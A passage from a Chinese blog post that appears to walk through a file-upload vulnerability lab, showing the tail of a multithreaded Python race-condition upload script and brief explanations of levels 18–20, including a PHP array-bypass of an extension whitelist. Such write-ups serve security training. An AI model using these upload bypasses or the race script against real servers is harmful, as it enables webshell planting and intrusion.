class="string">&#x27;image/jpeg&#x27;</span>)&#125;</span><br><span class="line">    data=&#123;<span class="string">&#x27;submit&#x27;</span>:<span class="string">&#x27;上传&#x27;</span>&#125;</span><br><span class="line">    r=requests.post(url=url,data=data,files=file)</span><br><span class="line">    r1=requests.get(url=geturl)</span><br><span class="line">    <span class="keyword">if</span> r1.status_code==<span class="number">200</span>:</span><br><span class="line">        print(<span class="string">&quot;upload success!&quot;</span>)</span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    pool = Pool(<span class="number">10</span>)</span><br><span class="line">    pool.map(CompeteUpload, range(<span class="number">10000</span>))</span><br><span class="line">    pool.close()</span><br><span class="line">    pool.join()</span><br></pre></td></tr></table></figure></div>

<h3 id="第18关"><a href="#第18关" class="headerlink" title="第18关"></a>第18关</h3><p>正确解法应该是条件竞争，但是我偷懒了，可以上传.7z文件，再利用文件包含进行解析<br><img src="/imgss/p85.png"><br><img src="/imgss/p86.png"></p>
<h3 id="第19关-文件解析"><a href="#第19关-文件解析" class="headerlink" title="第19关(文件解析)"></a>第19关(文件解析)</h3><p><img src="/imgss/p90.png"><br><img src="/imgss/p91.png"></p>
<h3 id="第20关-数组绕过"><a href="#第20关-数组绕过" class="headerlink" title="第20关(数组绕过)"></a>第20关(数组绕过)</h3><p><img src="/imgss/p93.png"><br><img src="/imgss/p94.png"></p>
<p>代码解释：<br>服务器端先是检查了MIME类型，然后判断save_name参数是否为空，为空就把文件本来名称赋值给$file,否则就是将save_name参数的值赋给它。紧接着判断$file是否是数组。</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PHP"><figure class="iseeu highlight /php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$file = <span class="keyword">empty</span>($_POST[<span class="string">&#x27;save_name&#x27;</span>]) ? $_FILES[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>] : $_POST[<span class="string">&#x27;save_name&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span> (!is_array($file)) &#123;</span><br><span class="line">    $file = explode(<span class="string">&#x27;.&#x27;</span>, strtolower($file));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>
<p>如果不是数组则将其拆成数组，然后数组最后一个的值(end函数就是取数组最后一个的值)同白名单做比较，符合jpg、png、gif中的一种就允许上传了。</p>
<p>那么为什么是save_name[2]呢，因为这段代码</p>
<div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$file_name &#x3D; reset($file) . &#39;.&#39; . $file[count($file) - 1];</span><br></pre></td></tr></table></figure></div>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E9%9D%B6%E5%9C%BA/" rel="tag"># 靶场</a>
              <a href="/tags/python/" rel="tag"># python</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/04/06/zimbra/" rel="prev" title="'zimbra邮件自动导出脚本'">
      <i class="fa fa-chevron-left"></i> 'zimbra邮件自动导出脚本'
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/04/30/USBninja/" rel="next" title="'黑客近源渗透利器之USB ninja'">
      '黑客近源渗透利器之USB ninja' <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC1%E3%80%812%E5%85%B3%E9%80%9A%E7%94%A8-%E5%89%8D%E7%AB%AFJS-MIME%E7%B1%BB%E5%9E%8B%E9%AA%8C%E8%AF%81"><span class="nav-number">1.</span> <span class="nav-text">第1、2关通用(前端JS,MIME类型验证)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC3%E5%85%B3-%E6%96%87%E4%BB%B6%E5%90%84%E7%B1%BB%E6%89%A9%E5%B1%95%E5%90%8D"><span class="nav-number">2.</span> <span class="nav-text">第3关(文件各类扩展名)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC4%E5%85%B3-htaccess"><span class="nav-number">3.</span> <span class="nav-text">第4关(.htaccess)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC5%E5%85%B3-%E9%BB%91%E5%90%8D%E5%8D%95%EF%BC%8C%E5%A4%A7%E5%B0%8F%E5%86%99"><span class="nav-number">4.</span> <span class="nav-text">第5关(黑名单，大小写)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC6%E5%85%B3-%E9%BB%91%E5%90%8D%E5%8D%95%EF%BC%8C%E7%A9%BA%E6%A0%BC"><span class="nav-number">5.</span> <span class="nav-text">第6关(黑名单，空格)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC7%E5%85%B3-%E9%BB%91%E5%90%8D%E5%8D%95%EF%BC%8C%E7%82%B9"><span class="nav-number">6.</span> <span class="nav-text">第7关(黑名单，点)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC8%E5%85%B3-%E9%BB%91%E5%90%8D%E5%8D%95%EF%BC%8CNTFS%E6%95%B0%E6%8D%AE%E6%B5%81"><span class="nav-number">7.</span> <span class="nav-text">第8关(黑名单，NTFS数据流)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC9%E5%85%B3-%E9%BB%91%E5%90%8D%E5%8D%95%EF%BC%8C%E7%82%B9-%E7%A9%BA%E6%A0%BC-%E7%82%B9"><span class="nav-number">8.</span> <span class="nav-text">第9关(黑名单，点+空格+点)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC10%E5%85%B3-%E9%BB%91%E5%90%8D%E5%8D%95%EF%BC%8C%E5%8F%8C%E5%86%99"><span class="nav-number">9.</span> <span class="nav-text">第10关(黑名单，双写)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC11%E5%85%B3-00%E6%88%AA%E6%96%AD"><span class="nav-number">10.</span> <span class="nav-text">第11关(%00截断)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC12%E5%85%B3-hex-00%E6%88%AA%E6%96%AD"><span class="nav-number">11.</span> <span class="nav-text">第12关(hex 00截断)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC13-15%E5%85%B3-%E5%9B%BE%E7%89%87%E9%A9%AC"><span class="nav-number">12.</span> <span class="nav-text">第13~15关(图片马)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC16%E5%85%B3-%E4%BA%8C%E6%AC%A1%E6%B8%B2%E6%9F%93"><span class="nav-number">13.</span> <span class="nav-text">第16关(二次渲染)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC17%E5%85%B3-%E6%9D%A1%E4%BB%B6%E7%AB%9E%E4%BA%89"><span class="nav-number">14.</span> <span class="nav-text">第17关(条件竞争)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC18%E5%85%B3"><span class="nav-number">15.</span> <span class="nav-text">第18关</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC19%E5%85%B3-%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90"><span class="nav-number">16.</span> <span class="nav-text">第19关(文件解析)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC20%E5%85%B3-%E6%95%B0%E7%BB%84%E7%BB%95%E8%BF%87"><span class="nav-number">17.</span> <span class="nav-text">第20关(数组绕过)</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="素念"
      src="/imgss/touxiang.jpg">
  <p class="site-author-name" itemprop="name">素念</p>
  <div class="site-description" itemprop="description">忘川河畔彼岸花，红如鲜血似朱砂</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">77</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">33</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:lingyu195@gmail.com" title="E-Mail → mailto:lingyu195@gmail.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="tencent://AddContact/?fromId=45&fromSubId=1&subcmd=all&uin=3504078815" title="QQ → tencent:&#x2F;&#x2F;AddContact&#x2F;?fromId&#x3D;45&amp;fromSubId&#x3D;1&amp;subcmd&#x3D;all&amp;uin&#x3D;3504078815" rel="noopener" target="_blank"><i class="fa fa-fw fa-qq"></i>QQ</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title">
      <i class="fa fa-fw fa-link"></i>
      友情链接
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="http://wp.fmk.pub/" title="http:&#x2F;&#x2F;wp.fmk.pub&#x2F;" rel="noopener" target="_blank">Defender</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://www.ch4ser.top/" title="http:&#x2F;&#x2F;www.ch4ser.top&#x2F;" rel="noopener" target="_blank">ch4ser</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://hackergu.com/" title="http:&#x2F;&#x2F;hackergu.com&#x2F;" rel="noopener" target="_blank">Gu</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://al0neranger.github.io/" title="https:&#x2F;&#x2F;al0neranger.github.io&#x2F;" rel="noopener" target="_blank">al0neranger</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">素念</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v5.2.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> v7.7.1
  </div>

    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
